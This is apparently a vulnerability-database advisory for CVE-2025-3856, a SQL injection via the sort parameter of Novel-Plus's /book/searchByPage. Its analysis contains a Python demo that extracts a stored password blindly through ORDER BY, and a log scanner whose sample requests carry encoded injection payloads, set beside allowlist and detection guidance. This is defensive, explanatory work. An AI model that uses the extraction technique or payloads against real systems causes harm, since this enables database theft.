
CVE-2025-3856: SQL Injection in xxyopen Novel-Plus

Medium
Tags: Vulnerability, CVE-2025-3856, cve, cve-2025-3856, sql-injection, injection
Published: Tue Apr 22 2025 (04/22/2025, 01:00:11 UTC)
Source: CVE
Vendor/Project: xxyopen
Product: Novel-Plus

Description

A vulnerability was found in xxyopen Novel-Plus 5.1.0. It has been classified as critical. This affects the function searchByPage of the file /book/searchByPage. The manipulation of the argument sort leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

AI-Powered Analysis

AI Last updated: 06/21/2025, 15:53:35 UTC

Technical Analysis

CVE-2025-3856 is a SQL injection vulnerability in xxyopen Novel-Plus 5.1.0, in the searchByPage function behind the /book/searchByPage endpoint. The sort argument is incorporated into a SQL query without validation, so a request carrying a crafted sort value changes the query the database executes. Note the rating mismatch: the VulDB description calls the flaw critical, while this page rates it Medium; the two labels come from different scales and should not be conflated.

A sort parameter on a search endpoint normally ends up in an ORDER BY clause. The advisory does not show the affected query, so treat this as the usual shape of the bug rather than a confirmed detail, but it matters for two reasons. First, injection into ORDER BY is typically blind: the attacker usually cannot append a second statement or read query output directly, but can supply conditional expressions (CASE WHEN ... THEN col1 ELSE col2 END) or time-based functions and infer database contents from the row order or the response time, and on some database engines can reach error-based extraction. Second, column names and sort directions cannot be bound as prepared-statement parameters, so the generic "use parameterized queries" advice does not by itself fix this class of bug; the value has to be mapped against an allowlist of permitted columns before it reaches the SQL text.

The advisory states the attack can be initiated remotely. It does not say whether authentication is required; book search is typically a reader-facing function, so assume the endpoint is reachable by anyone who can reach the site unless a deployment has restricted it. An exploit has been disclosed publicly. The vendor was contacted before disclosure and did not respond, and the record names no fixed version, so at the time of this analysis organizations running 5.1.0 have no vendor patch to apply. No exploitation in the wild has been reported yet, but the public exploit makes the endpoint a low-effort target.
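The following is an added example, not code from Novel-Plus or from the CVE record; the schema, table names, column names and stored password are constructed for the demonstration and are not the project's real data model. It builds an in-memory SQLite database, shows a search function that splices a sort value into ORDER BY, extracts a stored value one character at a time purely from the row order (blind, no query output needed), and then shows the allowlist replacement and why binding the sort value as a query parameter is not a fix.

```python
import sqlite3

# Constructed demo schema; NOT the Novel-Plus schema. Table and column
# names here are assumptions made for the illustration.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE book (id INTEGER PRIMARY KEY, book_name TEXT, visit_count INTEGER);
        CREATE TABLE user_info (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO book VALUES (1, 'Alpha', 300), (2, 'Beta', 100), (3, 'Gamma', 200);
        INSERT INTO user_info VALUES (1, 'admin', 's3cret');
    """)
    return conn


def search_vulnerable(conn, keyword, sort):
    """Vulnerable shape: the keyword is bound, but the sort value is spliced
    into ORDER BY, so the caller controls an expression the database evaluates."""
    sql = f"SELECT id FROM book WHERE book_name LIKE ? ORDER BY {sort}"
    return [row[0] for row in conn.execute(sql, (f"%{keyword}%",))]


def extract_secret(conn, charset="abcdefghijklmnopqrstuvwxyz0123456789", max_len=16):
    """Blind extraction through ORDER BY: the CASE expression sorts ascending by id
    when the guessed character is right and descending when it is wrong, so the
    id of the first row returned is the oracle. No query output is read directly."""
    found = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            payload = (
                f"(CASE WHEN (SELECT substr(password, {pos}, 1) FROM user_info "
                f"WHERE id = 1) = '{ch}' THEN id ELSE -id END)"
            )
            if search_vulnerable(conn, "", payload)[0] == 1:
                found += ch
                break
        else:
            break  # no character matched: end of the stored value
    return found


# Hardened version: map the user-supplied key to a fixed column name and the
# direction to a fixed keyword. The user's string never reaches the SQL text.
SORT_COLUMNS = {"id": "id", "name": "book_name", "visits": "visit_count"}
DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def validate_sort(sort, direction):
    """Return (column, direction) SQL fragments, or None if either is not allowlisted."""
    col = SORT_COLUMNS.get(sort)
    dirn = DIRECTIONS.get(str(direction).lower())
    if col is None or dirn is None:
        return None
    return col, dirn


def search_hardened(conn, keyword, sort="id", direction="asc"):
    validated = validate_sort(sort, direction)
    if validated is None:
        raise ValueError("invalid sort parameter")
    col, dirn = validated
    sql = f"SELECT id FROM book WHERE book_name LIKE ? ORDER BY {col} {dirn}"
    return [row[0] for row in conn.execute(sql, (f"%{keyword}%",))]


def search_bound_sort(conn, sort):
    """Binding the sort value as a parameter is injection-safe but wrong: the bound
    string is a constant expression, so every row gets the same sort key and the
    result is not ordered by the named column at all."""
    return [row[0] for row in conn.execute("SELECT id FROM book ORDER BY ?", (sort,))]


if __name__ == "__main__":
    conn = make_db()
    print("leaked via row order:", extract_secret(conn))
    print("hardened, visits desc:", search_hardened(conn, "", "visits", "desc"))
    print("bound sort (not actually sorted):", search_bound_sort(conn, "visit_count DESC"))
```

The oracle in extract_secret is the only thing the attacker observes: which book comes first. Any ordering the attacker can flip with a condition works, which is why this bug class cannot be stopped by hiding error messages or limiting result columns; only keeping the user value out of the SQL text (validate_sort) closes it.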

Potential Impact

For European organizations running xxyopen Novel-Plus 5.1.0, this vulnerability threatens the confidentiality and integrity of the application database and, through it, the availability of the service. Novel-Plus is a platform for hosting and distributing serialized fiction, so the database typically holds reader accounts, author content and purchase or subscription records. Exploitation could expose user data (a GDPR reportable event), leak paid content, or let an attacker alter stored content and account data. The advisory states the attack is remote; because book search is normally exposed to unauthenticated readers, assume any visitor can reach the endpoint unless a deployment has placed it behind authentication. Blind extraction through a sort parameter is slower than a classic UNION-based injection, but it is fully automatable with the published exploit, so large volumes of data can still be pulled out over time, and the same primitive can be used to create load on the database. Publishing, education and digital-media organizations in Europe that depend on this software for revenue-bearing functions are the most exposed.

Mitigation Recommendations

With no official patch available, organizations should apply compensating controls now and treat them as a stopgap, not a fix.

At the application layer, if the code can be modified, do not rely on prepared statements alone: a column name or sort direction cannot be bound as a parameter, so the correct fix is to map the incoming sort value to a fixed allowlist of column names and directions and reject anything else before the query is built. At the edge (WAF or reverse proxy), enforce the same idea on the sort parameter of /book/searchByPage: accept only values that look like a bare identifier with an optional asc/desc, after URL-decoding, and drop the request otherwise. Prefer this to keyword blocklists, since an ORDER BY payload can be built from parentheses, arithmetic and column names without any classic SQL keyword.

Reduce blast radius: run the application with a database account that has only the privileges the application needs (no DDL, no file or administrative privileges, and read-only access wherever the application only reads), and keep the application and database servers in separate network segments so a compromised application host cannot reach other data stores directly. If the deployment can tolerate it, restrict or temporarily disable the vulnerable endpoint until a fix exists.

Detect: log and review requests to /book/searchByPage, decode the query string before inspection, and alert on sort values that are not plain identifiers, on repeated requests from one source with varying sort values (the pattern of blind extraction), and on database slow-query logs showing conditional or time-delay expressions in ORDER BY.

Recover: keep tested backups of the database so that tampered content can be restored. Watch the project's repository and the CVE record for a fixed release, and, if the vendor remains unresponsive, plan for migration to maintained software.
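The detection step described above, as an added example that is not part of the original advisory: a small log scanner that parses combined-format access log lines, URL-decodes every sort value sent to /book/searchByPage, and flags values that do not match the allowlisted identifier shape. The log lines are constructed for the demonstration and are not real traffic; the endpoint path is the one named in the advisory, the column names are assumptions.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (Apache/Nginx combined style). These are NOT
# real traffic from any Novel-Plus deployment; payloads are percent-encoded
# the way a browser or tool would send them.
SAMPLE_LOG = """\
203.0.113.5 - - [22/Apr/2025:01:00:11 +0000] "GET /book/searchByPage?keyword=sea&sort=visit_count HTTP/1.1" 200 5120
203.0.113.5 - - [22/Apr/2025:01:00:12 +0000] "GET /book/searchByPage?keyword=sea&sort=id%20desc HTTP/1.1" 200 5120
198.51.100.7 - - [22/Apr/2025:01:00:13 +0000] "GET /book/searchByPage?sort=%28CASE%20WHEN%201%3D1%20THEN%20id%20ELSE%20-id%20END%29 HTTP/1.1" 200 5120
198.51.100.7 - - [22/Apr/2025:01:00:14 +0000] "GET /book/searchByPage?sort=id%2Csleep%285%29 HTTP/1.1" 200 5120
198.51.100.7 - - [22/Apr/2025:01:00:15 +0000] "GET /book/searchByPage?sort=visit_count/(1-1) HTTP/1.1" 200 5120
203.0.113.8 - - [22/Apr/2025:01:00:16 +0000] "GET /book/searchByPage?keyword=sea HTTP/1.1" 200 5120
203.0.113.8 - - [22/Apr/2025:01:00:17 +0000] "GET /book/info/1 HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Allowlist the SHAPE of a legitimate sort value: one identifier, optional
# direction. This catches the third attack line, which contains no SQL
# keyword at all and would slip past a keyword blocklist.
SAFE_SORT_RE = re.compile(r'^[A-Za-z_][A-Za-z0-9_]*(?: (?:asc|desc))?$', re.IGNORECASE)
ENDPOINT = "/book/searchByPage"


def sort_values(target):
    """Return every decoded 'sort' value in a request target aimed at the
    vulnerable endpoint; [] for other paths or when no sort is present."""
    parts = urlsplit(target)
    if parts.path != ENDPOINT:
        return []
    # parse_qs percent-decodes and turns '+' into a space, so matching below
    # happens on what the application would actually see.
    return parse_qs(parts.query, keep_blank_values=True).get("sort", [])


def find_suspicious(log_text):
    """Return (ip, timestamp, decoded_sort) for each request whose sort value
    is outside the allowlisted shape."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for value in sort_values(m["target"]):
            if not SAFE_SORT_RE.match(value):
                hits.append((m["ip"], m["ts"], value))
    return hits


def count_by_ip(hits):
    """Repeated anomalous sort values from one source are the signature of
    blind, character-by-character extraction."""
    return Counter(ip for ip, _, _ in hits)


if __name__ == "__main__":
    hits = find_suspicious(SAMPLE_LOG)
    for ip, ts, value in hits:
        print(f"{ts} {ip} sort={value!r}")
    print("anomalous requests per source:", dict(count_by_ip(hits)))
```

The same SAFE_SORT_RE is what a reverse proxy or WAF rule should enforce on the decoded parameter; running it over historical logs first tells you whether any benign client sends a sort value outside that shape before you turn the block on.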


Technical Details

Data Version: 5.1
Assigner Short Name: VulDB
Date Reserved: 2025-04-21T14:20:20.282Z
CISA Enriched: true

Threat ID: 682d984ac4522896dcbf78ed

Added to database: 5/21/2025, 9:09:30 AM

Last enriched: 6/21/2025, 3:53:35 PM

Last updated: 8/11/2025, 6:57:57 PM

